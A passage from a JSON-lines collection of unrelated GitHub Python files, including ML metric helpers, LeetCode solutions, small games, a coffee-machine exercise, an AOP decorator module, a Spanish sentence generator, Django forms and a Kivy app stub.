top_pred),\n 'Precision': metrics.precision_score(y_true, top_pred),\n 'Balanced Accuracy': metrics.balanced_accuracy_score(y_true, top_pred),\n 'F1 Score': metrics.f1_score(y_true, top_pred),\n 'Matthews Correlation Coefficient': metrics.matthews_corrcoef(y_true, top_pred)\n }\n\n return perf\n\ndef cal_performance(result_list):\n result_min = min(result_list)\n result_max = max(result_list)\n result_mean = np.mean(result_list)\n result_var = np.var(result_list)\n result_median = np.median(result_list)\n result_std = np.std(result_list, ddof = 1)\n \n results = pd.DataFrame(columns=['value'])\n results.loc['min'] = result_min\n results.loc['max'] = result_max\n results.loc['mean'] = result_mean\n results.loc['var'] = result_var\n results.loc['median'] = result_median\n results.loc['std'] = result_std\n \n return results\n\n\n\ndef random_select_samples_group(X_sel, Y, tki, Y_tki, group_tki, group_train, feature_name):\n group_dict = {}\n select_num = 2\n \n mask = [c for c in feature_name]\n X_test = tki[mask]\n Y_test = Y_tki\n \n for index, value in enumerate(group_tki):\n if value not in group_dict.keys():\n group_dict[value] = []\n group_dict[value].append(index)\n else:\n group_dict[value].append(index)\n \n selected_tki = []\n for key in group_dict:\n slice = random.sample(group_dict[key], select_num)\n selected_tki.extend(slice)\n \n print(\"Selected sample list:\", selected_tki)\n \n tki_list = [i for i in range(len(Y_test))]\n tki_rest = list(set(tki_list).difference(set(selected_tki)))\n \n X_test_s = X_test.loc[selected_tki]\n Y_test_s = Y_test.loc[selected_tki]\n \n X_test_new = X_test.loc[tki_rest]\n Y_test_new = Y_test.loc[tki_rest]\n \n X_sel.columns = feature_name\n \n # Reset the group information\n group_tki_select = group_tki.loc[selected_tki]\n group_tki_new = ['Abl' for i in group_tki_select]\n group_tki_new = pd.Series(group_tki_new)\n \n X_train = pd.concat([X_sel, X_test_s], axis=0, ignore_index=True)\n Y_train = pd.concat([Y, Y_test_s], axis=0, ignore_index=True)\n Group = pd.concat([group_train, group_tki_new], axis=0, ignore_index=True)\n \n pTest = deepcopy(tki.loc[tki_rest][['PDB_ID', 'MUTATION','DDG.EXP']]).reset_index()\n \n return X_train, 
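binary_perf_top above labels the highest-scoring fraction of predictions positive before computing the sklearn metrics; the heapq.nlargest call returns the indices of the top scores. That selection, as a small helper:

import heapq

def top_fraction_labels(scores, fraction=0.15):
    k = int(len(scores) * fraction)
    top_idx = set(heapq.nlargest(k, range(len(scores)), scores.__getitem__))
    return [1 if i in top_idx else 0 for i in range(len(scores))]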
Y_train, X_test_new, Y_test_new, pTest, Group\n\n\ndef random_select_samples(X_sel, Y, tki, Y_tki, group_tki, feature_name):\n group_dict = {}\n select_num = 2\n mask = [c for c in feature_name]\n X_test = tki[mask]\n Y_test = Y_tki\n \n for index, value in enumerate(group_tki):\n if value not in group_dict.keys():\n group_dict[value] = []\n group_dict[value].append(index)\n else:\n group_dict[value].append(index)\n \n selected_tki = []\n for key in group_dict:\n slice = random.sample(group_dict[key], select_num)\n selected_tki.extend(slice)\n \n print(\"Selected sample list:\", selected_tki)\n \n tki_list = [i for i in range(len(Y_test))]\n tki_rest = list(set(tki_list).difference(set(selected_tki)))\n \n X_test_s = X_test.loc[selected_tki]\n Y_test_s = Y_test.loc[selected_tki]\n \n X_test_new = X_test.loc[tki_rest]\n Y_test_new = Y_test.loc[tki_rest]\n \n X_sel.columns = feature_name\n \n X_train = pd.concat([X_sel, X_test_s], axis=0, ignore_index=True)\n Y_train = pd.concat([Y, Y_test_s], axis=0, ignore_index=True)\n \n pTest = deepcopy(tki.loc[tki_rest][['PDB_ID', 'MUTATION','DDG.EXP']]).reset_index()\n \n return X_train, Y_train, X_test_new, Y_test_new, pTest","repo_name":"yangziyi1990/SPLDExtraTrees","sub_path":"Code/measure_function.py","file_name":"measure_function.py","file_ext":"py","file_size_in_byte":5255,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"28205627083","text":"def facto(no):\r\n if no==0:\r\n return 1\r\n a= no* facto(no-1)\r\n return a\r\n\r\ndef main():\r\n value=int(input(\"Enter value to get factorial: \"))\r\n ret=facto(value)\r\n print(\"factorial of {} is {}\".format(value,ret))\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"ashish-junghare/Python","sub_path":"Assignment7_5.py","file_name":"Assignment7_5.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"70295513991","text":"from collections import Counter\nfrom typing import List\n\ndef leastInterval(tasks: List[str], n: int) -> int:\n num_cycles = 0\n tasks = [c for c in Counter(tasks).values()]\n while tasks:\n tasks = sorted(tasks, reverse=True)\n add = 0\n for i in range(n+1):\n if i < len(tasks):\n tasks[i] = tasks[i] - 1\n if tasks[i] < 1:\n del tasks[i]\n add = add + 1\n elif not tasks:\n break\n else:\n add = add + 1\n num_cycles = num_cycles + add\n \n return num_cycles\n\nprint(leastInterval([\"A\",\"A\",\"A\",\"B\",\"B\",\"B\"], 2))","repo_name":"branislav1991/Algorithms","sub_path":"least_interval.py","file_name":"least_interval.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73687652553","text":"from e_caller import ECallerHistory\nfrom helpers import normalizeState\nimport torch\nfrom glob import glob\nimport matplotlib.pyplot as plt\nimport sys\n\nif len(sys.argv) < 2:\n\tprint(\"Needs a positive int argument\")\n\tsys.exit()\ntry:\n\tindex = int(sys.argv[1])\nexcept:\n\tprint(\"Needs a positive int argument\")\n\tsys.exit()\n\nhist = ECallerHistory.load(\"nn_again4\")\ninfos = sum(list(hist.history.values()), [])\n\nsuccesses = [info for info in infos if info['solved']]\nbig_succ = [i for i in successes if len(i['states']) > 2000]\nsucc = big_succ[index]\n\n#model_paths = sorted(glob(\"model_histories/nn_third0_train/*\"))\n#model_paths = 
sorted(glob(\"model_histories/nn_short_blame_low_entropy0_train/*\"))\n#model_paths = sorted(glob(\"model_histories/nn_again0_train/*\"))\nmodel_paths = sorted(glob(\"model_histories/nn_again4_train/*\"))\n\nmodels = [torch.load(model_path) for model_path in model_paths]\n\n\n\ndef getPolicies(model, state):\n\treturn [x.item() for x in torch.softmax(model(state), dim=1).reshape(-1)]\n\n# First Plot is CEF preferences for the start state of succ as it changes over \"models\"\ni = 0\n#i = 1000\nall_states = normalizeState(succ['states']).to(torch.float)\nstart_state = all_states[i].reshape(1,-1)\npolicies = [getPolicies(model, start_state) for model in models]\nprint(policies[-1])\ntime_series = list(zip(*policies))\n\nxs = list(range(len(models)))\nplt.stackplot(xs, *time_series)\nplt.xlabel(\"Policy #\")\nplt.ylabel(\"CEF selection probabilities\")\nplt.xlim(0,len(xs))\nplt.savefig(f\"figures/actor_during_training_{succ['problem']}.png\")\n\n\n# The Second Plot is CEF preferences for the ith state of succ for the final model.\nplt.figure()\n\nmodel = models[-1]\npolicies = [getPolicies(model, state.reshape(1,-1)) for state in all_states]\ntime_series = list(zip(*policies))\n\nxs = list(range(len(succ['states'])))\nplt.stackplot(xs, *time_series)\nplt.xlabel(\"Given Clause Selections\")\nplt.ylabel(\"CEF selection probabilities\")\nplt.xlim(0,2000)\nplt.savefig(f\"figures/actor_after_training_{succ['problem']}.png\")\n","repo_name":"jackeown/Reinforce_E","sub_path":"makeActorPlot.py","file_name":"makeActorPlot.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14746588691","text":"# coding: utf8\r\n\r\n__all__ = [\"aspect\", \"get_aspect\", \"is_aspect_present\",\r\n \"before\", \"get_before\", \"is_before_present\",\r\n \"around\", \"get_around\", \"is_around_present\",\r\n \"after_throwing\", \"get_after_throwing\", \"is_after_throwing_present\",\r\n \"after_returning\", \"get_after_returning\", \"is_after_returning_present\",\r\n \"after\", \"get_after\", \"is_after_present\"]\r\n__authors__ = [\"Tim Chow\"]\r\n\r\nimport inspect\r\nimport types # used by AdviceFactory, DON'T DELETE IT\r\n\r\nfrom ..reflect import get_declared_fields\r\n\r\n\r\ndef aspect(order):\r\n if not isinstance(order, int):\r\n raise ValueError(\"int expected\")\r\n\r\n def _inner(cls):\r\n if not inspect.isclass(cls):\r\n raise RuntimeError(\"class expected\")\r\n setattr(cls, \"__aop_aspect__\", order)\r\n return cls\r\n return _inner\r\n\r\n\r\ndef get_aspect(cls):\r\n if not inspect.isclass(cls):\r\n return None\r\n if \"__aop_aspect__\" not in get_declared_fields(cls, only_names=True):\r\n return None\r\n order = getattr(cls, \"__aop_aspect__\")\r\n if not isinstance(order, int):\r\n return None\r\n return order\r\n\r\n\r\ndef is_aspect_present(cls):\r\n return get_aspect(cls) is not None\r\n\r\n\r\nclass AdviceFactory(object):\r\n define_advice_type = \"{{ADVICE_TYPE_PLACEHOLDER}}\"\r\n\r\n advice = \"\"\"\\\r\ndef {{ADVICE_TYPE_PLACEHOLDER}}(point_cut):\r\n def _inner(f):\r\n if not isinstance(f, types.FunctionType):\r\n raise RuntimeError(\"function expected\")\r\n setattr(\r\n f,\r\n \"__aop_point_cut_{{ADVICE_TYPE_PLACEHOLDER}}__\",\r\n point_cut)\r\n return f\r\n return _inner\r\n\"\"\"\r\n\r\n get_advice = \"\"\"\\\r\ndef get_{{ADVICE_TYPE_PLACEHOLDER}}(f):\r\n if not isinstance(f, types.MethodType):\r\n raise RuntimeError(\"method expected\")\r\n if 
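AdviceFactory above generates the before/around/after decorator families by substituting the advice name into string templates and exec-ing them. The decorator each template expands to has this closure shape (shown here for one family, without the paired getter/predicate the factory also emits):

import types

def make_advice(advice_type):
    attr = "__aop_point_cut_%s__" % advice_type

    def advice(point_cut):
        def _inner(f):
            if not isinstance(f, types.FunctionType):
                raise RuntimeError("function expected")
            setattr(f, attr, point_cut)
            return f
        return _inner

    return advice

before = make_advice("before")  # equivalent to the exec-generated `before`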
\"__aop_point_cut_{{ADVICE_TYPE_PLACEHOLDER}}__\" not in get_declared_fields(f, only_names=True):\r\n return None\r\n attr_value = getattr(\r\n f, \r\n \"__aop_point_cut_{{ADVICE_TYPE_PLACEHOLDER}}__\")\r\n if not isinstance(attr_value, basestring):\r\n return None\r\n return attr_value\r\n\"\"\"\r\n\r\n is_advice_present = \"\"\"\\\r\ndef is_{{ADVICE_TYPE_PLACEHOLDER}}_present(f):\r\n return get_{{ADVICE_TYPE_PLACEHOLDER}}(f) is not None\r\n\"\"\"\r\n\r\n @classmethod\r\n def create(cls, advice_type):\r\n if advice_type not in [\"before\", \"around\",\r\n \"after_throwing\", \"after_returning\",\r\n \"after\"]:\r\n raise ValueError(\"invalid advice type\")\r\n _locals = {}\r\n exec(cls.advice.replace(cls.define_advice_type, advice_type),\r\n globals(),\r\n _locals)\r\n exec(cls.get_advice.replace(cls.define_advice_type, advice_type),\r\n globals(),\r\n _locals)\r\n exec(cls.is_advice_present.replace(cls.define_advice_type, advice_type),\r\n globals(),\r\n _locals)\r\n return (_locals[advice_type],\r\n _locals[\"get_\" + advice_type],\r\n _locals[\"is_\" + advice_type + \"_present\"])\r\n\r\n\r\nbefore, get_before, is_before_present = AdviceFactory.create(\"before\")\r\naround, get_around, is_around_present = AdviceFactory.create(\"around\")\r\nafter, get_after, is_after_present = AdviceFactory.create(\"after\")\r\nafter_throwing, get_after_throwing, \\\r\n is_after_throwing_present = AdviceFactory.create(\"after_throwing\")\r\nafter_returning, get_after_returning, \\\r\n is_after_returning_present = AdviceFactory.create(\"after_returning\")\r\n","repo_name":"tim-chow/summermvc","sub_path":"summermvc/decorator/aop.py","file_name":"aop.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4525078268","text":"from menu import MENU\napproved_commands = [\n \"espresso\",\n \"latte\",\n \"cappucio\",\n \"off\",\n \"report\"\n]\n\nresources = {\n \"water\": 300,\n \"milk\": 200,\n \"coffee\": 100,\n \"money\": 0,\n}\n\n\ndef main():\n while True:\n user_choice = get_user_input()\n print(\"\\nYour choice is %s\" % (user_choice))\n\n if user_choice == \"off\":\n print(\"Shutting off\")\n break\n elif user_choice == \"report\":\n print_report()\n else:\n sufficientcy = check_sufficientcy(user_choice)\n if sufficientcy:\n totale_user_values = process_coins()\n check_price(user_choice, totale_user_values)\n\n\ndef get_user_input():\n user_choice = input(\"\\nWhat would you like? \\n\").lower()\n while user_choice not in approved_commands:\n user_choice = input(\n \"\\nInvalid parameter.\\nWhat would you like? 
\\n\").lower()\n return user_choice\n\n\ndef print_report():\n print(\n \"\"\"\n Water: %sml\n Milk: %sml\n Coffee: %sg\n Money: $%s\n \"\"\" % (resources[\"water\"], resources[\"milk\"], resources[\"coffee\"], resources[\"money\"])\n )\n\n\ndef check_sufficientcy(coffee_type):\n for ingredient in MENU[coffee_type][\"ingredients\"]:\n if MENU[coffee_type][\"ingredients\"][ingredient] <= resources[ingredient]:\n return True\n else:\n print(\"Sorry, we are out of resources\")\n return False\n\n\ndef pure_coffee(coffee_type):\n pass\n\n\ndef process_coins():\n quaters = float(input(\"Enter quaters: \"))\n dimes = float(input(\"Enter dimes: \"))\n nickels = float(input(\"Enter nickles: \"))\n pennies = float(input(\"Enter pennies: \"))\n return quaters*0.25+dimes*0.1+nickels*0.05+pennies*0.01\n\n\ndef check_price(coffee_type, value):\n if MENU[coffee_type][\"cost\"] <= value:\n resources[\"money\"] = MENU[coffee_type][\"cost\"]\n print(\"Change is %s\" % (value-MENU[coffee_type][\"cost\"]))\n for ingredient in MENU[coffee_type][\"ingredients\"]:\n resources[ingredient] = resources[ingredient] - \\\n MENU[coffee_type][\"ingredients\"][ingredient]\n print(\"Enjoy your coffee!\")\n\n return True\n else:\n print(\"Insufficient amount of money\")\n print(\"Money refunded\")\n return False\n\n\nmain()\n","repo_name":"ViktorSheverdin/coffeemachine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"351274265","text":"from Definitions import *\nclass Level:\n def __init__(self,name,dimension,level,foreground,background,endPos,startPos=(1,1,1,1)):\n self.name=name\n self.dimension=dimension\n self.size=len(level)\n self.foreground=foreground\n self.background=background\n self.endPos=endPos\n self.startPos=startPos\n self.level=level\n endPos+=[1,1]\n self.level[endPos[0],endPos[1],endPos[2],endPos[3]]=0\n def __getitem__(self,*index):\n index=index[0]\n x,y=index[:2]\n try:\n item=self.level[x,y,1,1]\n item=self.level[x,y,index[2],1]\n item=self.level[x,y,index[2],index[3]]\n except TypeError:\n pass\n return item\nclass Player:\n inMove=0\n dx=0\n dy=0\n dz=0\n dw=0\n moveTime=8\n def __init__(self,x,y,z,w):\n self.x=x\n self.y=y\n self.z=z\n self.w=w\n def move(self,level,dx=0,dy=0,dz=0,dw=0):\n self.inMove=self.moveTime\n try:\n wall=level[self.x+dx,self.y+dy,self.z+dz,self.w+dw]\n except IndexError:\n wall=0\n if wall:\n self.inMove=0\n self.dx=dx\n self.dy=dy\n self.dz=dz\n self.dw=dw\n def getIntPos(self):\n return(int(self.x),int(self.y),int(self.z),int(self.w))\n def getPos(self):\n return(self.x,self.y,self.z,self.w)\n def update(self,state):\n keys=pygame.key.get_pressed()\n if not self.inMove:\n move=None\n if keys[pygame.K_UP]or keys[pygame.K_w]:\n move=(0,-1)\n if keys[pygame.K_DOWN]or keys[pygame.K_s]:\n move=(0,1)\n if keys[pygame.K_LEFT]or keys[pygame.K_a]:\n move=(-1,0)\n if keys[pygame.K_RIGHT]or keys[pygame.K_d]:\n move=(1,0)\n if move:\n self.move(state.level,*orientPos(state.orient,(0,0,0,0),move))\n if self.inMove:\n factor=2*self.inMove/(self.moveTime**2+self.moveTime)\n self.x+=self.dx*factor\n self.y+=self.dy*factor\n self.z+=self.dz*factor\n self.w+=self.dw*factor\n self.inMove-=1\n if self.inMove==0:\n self.x=round(self.x)\n self.y=round(self.y)\n self.z=round(self.z)\n 
self.w=round(self.w)\n","repo_name":"DecklynKern/HyperMaze","sub_path":"Classes.py","file_name":"Classes.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1172684599","text":"import pygame, gui, player, platform, particles\nfrom pygame.locals import *\n\npygame.init()\npygame.mixer.init()\nscreen = pygame.display.set_mode((0, 0))\n\nw, h = pygame.display.get_surface().get_size()\nclock = pygame.time.Clock()\nfont = pygame.font.SysFont(\"Arial\", 18)\n\nTilesSurface = pygame.Surface((20, 20))\n\nCamX, CamY = (0,0)\nallsprites = pygame.sprite.Group()\nallLevelsprites = pygame.sprite.Group()\ncollisions = pygame.sprite.Group()\nfakeLevel = pygame.sprite.Group()\nticks = 0\ndeltaTime = 0\nfoward = True\nfloors = []\nfakefloors = []\nDebugs = False\nparticlesArr = []\nlevel = 1\nscreentransition = False\nscreentransitionFrame = 0\n\n\ndef update_fps():\n global deltaTime, ticks\n fps = str(int(clock.get_fps()))\n if(ticks > 25):\n deltaTime = (61/(int(fps)+1))\n else:\n deltaTime = 1\n ticks += 1\n fps_text = font.render(fps, 1, pygame.Color(\"coral\"))\n TilesSurface.fill((3, 3, 3))\n TilesSurface.blit(fps_text, (0,0))\n\n return TilesSurface\n\ndef loadLevel(level):\n floors.clear()\n collisions.empty()\n allLevelsprites.empty()\n \n f = open(\"Levels/\" + str(level) +\".txt\", \"r\")\n row = []\n col = []\n linecount = 0\n rowlen = 0\n for line in f:\n if line != \"\\n\":\n linecount += 1\n row = line.split(\",\")\n for i in row:\n rowlen = len(row)\n col.append(row)\n print(col)\n print (len(col))\n for y in range(linecount):\n for x in range(rowlen):\n if(col[y][x] == \"1\" or col[y][x] == \"1\\n\"):\n floors.append(platform.Platform(x=x*(w/(rowlen-1)), y=y*(h/(linecount - 1)), w= (w/(rowlen-1)) + 1, h = (h/(linecount - 1)) + 1))\n if(col[y][x] == \"2\" or col[y][x] == \"2\\n\"):\n floors.append(platform.Spike(x=x*(w/(rowlen-1)), y=y*(h/(linecount - 1)), w= (w/(rowlen-1)) + 1, h = (h/(linecount - 1)) + 1))\n for i in floors:\n allLevelsprites.add(i)\n collisions.add(i)\n allLevelsprites.draw(screen)\n\n\ndef TestWorld():\n floor1 = platform.Platform(x=720, y =950, w=1250, h=125)\n collisions.add(floor1)\n allsprites.add(floor1)\n floor2 = platform.Platform(x=720, y =500, w=75, h=600)\n collisions.add(floor2)\n allsprites.add(floor2)\n \ndef loadFakeLevel(level):\n fakeLevel.empty() \n fakefloors.clear()\n\n f = open(\"Levels/\" + str(level) +\".txt\", \"r\")\n row = []\n col = []\n linecount = 0\n rowlen = 0\n for line in f:\n if line != \"\\n\":\n linecount += 1\n row = line.split(\",\")\n for i in row:\n rowlen = len(row)\n col.append(row)\n print(col)\n print (len(col))\n for y in range(linecount):\n for x in range(rowlen):\n if(col[y][x] == \"1\" or col[y][x] == \"1\\n\"):\n fakefloors.append(platform.Platform(x=x*(w/(rowlen-1)), y=y*(h/(linecount - 1)), w= (w/(rowlen-1)) + 1, h = (h/(linecount - 1)) + 1))\n if(col[y][x] == \"2\" or col[y][x] == \"2\\n\"):\n fakefloors.append(platform.Spike(x=x*(w/(rowlen-1)), y=y*(h/(linecount - 1)), w= (w/(rowlen-1)) + 1, h = (h/(linecount - 1)) + 1))\n for i in fakefloors:\n fakeLevel.add(i)\n\n\n\nloadLevel(1)\n#TestWorld()\n\ndef playerlogic():\n global screentransition, screentransitionFrame, CamX, level, foward\n if(screentransition and screentransitionFrame < 30):\n player.canmove = False\n if(foward): \n if(screentransitionFrame == 0):\n loadFakeLevel(level + 1)\n CamX += w/30 * deltaTime\n screentransitionFrame += 1 * deltaTime\n else:\n 
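# [editorial note] update_fps() above estimates deltaTime as 61/(fps + 1), which is noisy
# for the first frames. A common alternative sketch (assumes pygame; not part of the
# original record): Clock.tick() already returns the elapsed milliseconds, so
#
#     ms = clock.tick(60)               # caps the loop at 60 FPS, returns elapsed ms
#     deltaTime = ms / (1000.0 / 60.0)  # 1.0 when running at exactly 60 FPS
#
# keeps movement speed independent of the achieved frame rate without an FPS estimate.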
if(screentransitionFrame == 0):\n loadFakeLevel(level - 1)\n CamX -= w/30 * deltaTime\n screentransitionFrame += 1 * deltaTime\n\n\n elif(screentransitionFrame >= 30):\n\n if(foward):\n level += 1\n player.x = 25\n else:\n level -=1\n player.x = w - 25\n player.canmove = True\n screentransitionFrame = 0\n screentransition = False\n loadLevel(level)\n fakeLevel.empty()\n CamX=0\n print(\"yes!\")\n if(player.x > w - 1):\n foward = True\n screentransition = True\n if(player.x < 1 ):\n foward = False\n screentransition = True\n\n\ndef renders():\n\n playerlogic()\n allsprites.update(CamX, CamY, collisions, deltaTime)\n allsprites.draw(screen)\n allLevelsprites.draw(screen)\n allLevelsprites.update(CamX, CamY, collisions, deltaTime)\n if(foward):\n fakeLevel.update(CamX - w, 0, collisions, deltaTime)\n else:\n fakeLevel.update(CamX + w, 0, collisions, deltaTime) \n fakeLevel.draw(screen)\n \n pos = 0\n for par in particlesArr:\n pos+=1\n screen.blit(par.update(deltaTime), (par.x, par.y))\n if(par.frame > par.lifetime):\n particlesArr.pop(pos-1)\n\n\nplayer = player.Player(x= 90, y= 255 , screen=screen)\nallsprites.add(player)\n\n\n\n\ndef Debug():\n if(player.isground):\n pygame.draw.rect(screen, (255,255,255) , player.rectBottom, 3)\n else: \n pygame.draw.rect(screen, (255,0,0) , player.rectBottom, 3)\n if(player.LeftWall):\n pygame.draw.rect(screen, (255,255,255) , player.rectLeft, 3)\n else:\n pygame.draw.rect(screen, (255,255,0) , player.rectLeft, 3)\n if(player.RightWall):\n pygame.draw.rect(screen, (255,255,255) , player.rectRight, 3)\n else:\n pygame.draw.rect(screen, (255,0,255) , player.rectRight, 3)\n pygame.draw.rect(screen, (0,255,255) , player.rectTop, 3)\n for i in collisions:\n pygame.draw.rect(screen, (0,255,0) , i.rect, 3)\n\n\nloop = 1\nwhile loop:\n \n clock.tick(60)\n screen.fill((237, 180, 235))\n\n pressed_keys = pygame.event.get()\n for event in pressed_keys:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n loop = 0 \n if event.key == pygame.K_F1:\n if Debugs:\n Debugs = False\n else:\n Debugs = True\n if event.type == pygame.QUIT:\n loop = 0\n renders()\n \n screen.blit(update_fps(), (10,screen.get_height() * 0.97))\n if(Debugs == True):\n Debug()\n pygame.display.update()","repo_name":"Conker923four/squares","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6275,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"41925038755","text":"from Spanish_Utils.randomize import choice\nfrom Spanish_Utils.vocab_sets import *\nfrom Spanish_Utils.string_utils import *\nimport sys\n\n#preposiciones: after, through, before, while, without\npreps = ['antes de','después de','mientras', 'sin']\n#could_should = ['podría','podrían','debería','deberían']\n\n#all_animate_pl_nouns_f, ...\n#d_fem_pl, ...\n#all_p3is_anim_subj_allowing_verbs\n\n#FOR QUIEN --> all_anim_anim_verbs_3is(p)_pst\n\n # What did John read before filing the book?\n # que leyo juan antes de ?? 
el libro?\n # que_quien[0] vbpastpret_anim_to_inanim preps vb_tr det noun\n # Wh Aux_mat Subj V_mat ADV V_emb Obj\n # What did John read the book before filing?\n # Wh Aux_mat Subj V_mat Obj ADV V_emb\n\n\ndef sample(iter,out):\n for i in range(iter):\n prep = choice(preps)\n V2 = verb_cleanup(choice(all_non_finite_transitive_verbs),remove_se_inf = True)\n #quien, needs non-anim to anim verb\n if np.random.choice([True,False]):\n #plural agent and anim anim verb\n q = que_quien[1]\n V1 = choice(all_anim_anim_verbs_3ip_pst)\n #choose masc/fem agent\n if np.random.choice([True, False]):\n #fem pl\n ag_det = choice(d_fem_pl)\n ag = choice(n_fem_pl)\n else:\n #masc pl\n ag_det = choice(d_masc_pl)\n ag = choice(n_masc_pl)\n elif np.random.choice([True,False]):\n #singular agent anim anim verb\n q = que_quien[1]\n V1 = choice(all_anim_anim_verbs_3is_pst)\n if np.random.choice([True,False]):\n #fem sg\n ag_det = choice(d_fem_sg)\n ag = choice(n_fem_sg,all_proper_nouns)\n else:\n #masc sg\n ag_det = choice(d_masc_sg)\n ag = choice(n_masc_sg, all_proper_nouns)\n elif np.random.choice([True,False]):\n #plural agent non anim verb\n q = que_quien[0]\n V1 = choice(past_pret_3p)\n #choose masc/fem agent\n if np.random.choice([True, False]):\n #fem pl\n ag_det = choice(d_fem_pl)\n ag = choice(n_fem_pl)\n else:\n #masc pl\n ag_det = choice(d_masc_pl)\n ag = choice(n_masc_pl)\n else:\n #sg agent non anim verb\n q = que_quien[0]\n V1 = choice(past_pret_3s)\n #choose masc/fem agent\n if np.random.choice([True, False]):\n #fem pl\n ag_det = choice(d_fem_sg)\n ag = choice(n_fem_sg, all_proper_nouns)\n else:\n #masc pl\n ag_det = choice(d_masc_sg)\n ag = choice(n_masc_sg,all_proper_nouns)\n #make pl/sg choice for obj\n if np.random.choice([True,False]):\n #plural object\n if np.random.choice([True,False]):\n #fem pl\n obj_det = choice(d_fem_pl)\n obj = choice(n_fem_pl)\n else:\n #masc pl\n obj_det = choice(d_masc_pl)\n obj = choice(n_masc_pl)\n else:\n #singular objeCT\n if np.random.choice([True,False]):\n #fem sg\n obj_det = choice(d_fem_sg)\n obj = choice(n_fem_sg,all_proper_nouns)\n else:\n #masc sg\n obj_det = choice(d_masc_sg)\n obj = choice(n_masc_sg, all_proper_nouns)\n \n data = {\n 'sentence_good':string_beautify('%s %s %s %s %s %s %s %s' % (q,V1,ag_det,ag,prep,V2,obj_det,obj), question = True),\n 'sentence_bad':string_beautify('%s %s %s %s %s %s %s %s' % (q,V1,ag_det,ag,obj_det,obj,prep,V2), question = True)\n }\n out.write(str(data)+'\\n')\ntry:\n iter = int(sys.argv[1])\n out = open(sys.argv[2],'w')\n sample(iter,out)\nexcept IndexError:\n print('To run this file use:\\npython adjunct_island.py <# of sentences> ')\n sys.exit()\n\n","repo_name":"MikeinBoulder/data_generation","sub_path":"Spanish_Benchmark/Spanish_Categories/island_effects/adjunct_island.py","file_name":"adjunct_island.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32422255801","text":"class Solution:\n def scoreOfParentheses(self, S: str) -> int:\n stack = []\n for x in S:\n if x == '(':\n stack.append(x)\n else:\n if stack[-1] == '(':\n stack.pop()\n if stack and not stack[-1] == '(':\n stack[-1] += 1\n else:\n stack.append(1)\n else:\n v, _ = stack.pop(), stack.pop()\n if stack and not stack[-1] == '(':\n stack[-1] += v * 2\n else:\n stack.append(v * 2)\n return stack[0]\n\nclass Solution:\n def scoreOfParentheses(self, S: str) -> int:\n ans = bal = 0\n for i, x in enumerate(S):\n if x == '(':\n bal += 1\n else:\n bal -= 
1\n if S[i - 1] == '(':\n ans += 1 << bal\n return ans\n\nif __name__ == '__main__':\n solver = Solution()\n cases = [\n \"()\",\n \"()()\",\n \"(())\",\n \"()(())\",\n \"(()(()))\"\n ]\n rslts = [solver.scoreOfParentheses(S) for S in cases]\n for cs, rs in zip(cases, rslts):\n print(f\"case: {cs} | solution: {rs}\")\n","repo_name":"gyang274/leetcode","sub_path":"src/0800-0899/0856.parentheses.score.py","file_name":"0856.parentheses.score.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"34990501019","text":"from django import forms\nfrom django.core.exceptions import ValidationError\nfrom django.forms import widgets\n\nfrom webapp.models import Ad, Comment\n\n\nclass AdForm(forms.ModelForm):\n class Meta:\n model = Ad\n fields = ['photo', 'title', 'description', 'category', 'price']\n widgets = {\n 'title': forms.TextInput(attrs={'class': 'form-control'}),\n 'description': forms.Textarea(attrs={'class': 'form-control'}),\n }\n error_messages = {\n 'content': {\n 'required': 'Поле должно быть заполнено'\n }\n }\n\n\nclass SimpleSearchForm(forms.Form):\n search = forms.CharField(max_length=50, required=False, label='Найти', widget=widgets.TextInput(attrs={'class': \"form-control w-25\"}))\n\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ['text']","repo_name":"Bandeguras/exam_9","sub_path":"source/webapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42636086456","text":"# -*- coding: utf-8 -*-\n# Author: Tamas Marton\n\nimport sys\nimport time\nimport kivy\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.tabbedpanel import TabbedPanel\nfrom kivy.logger import Logger\nfrom kivy.properties import ObjectProperty, ListProperty\nfrom kivy.app import App\n\nfrom kivy.uix.screenmanager import ScreenManager, Screen, SlideTransition\n\n\nfrom kivy.adapters.dictadapter import DictAdapter\nfrom kivy.adapters.simplelistadapter import SimpleListAdapter\nfrom kivy.uix.listview import ListItemButton, ListItemLabel, CompositeListItem, ListView\n\nfrom kivy.uix.popup import Popup\nfrom kivy.uix.label import Label\nfrom kivy.uix.button import Button\nfrom kivy.uix.image import Image\n\n'''Fixing OSX Mavericks stupid locale bug'''\nimport platform\nif platform.system() == \"Darwin\":\n\timport locale\n\tlc = locale.getlocale()\n\tif lc[0]== None and lc[1]== None:\n\t\tlocale.setlocale(locale.LC_ALL, 'en_US')\n\n\nclass TasksScreen(Screen):\n\tpass\n\nclass ExecutingScreen(Screen):\n\tpass\n\nclass NoTaskSelectedDialog(Popup):\n\tpass\n\nclass 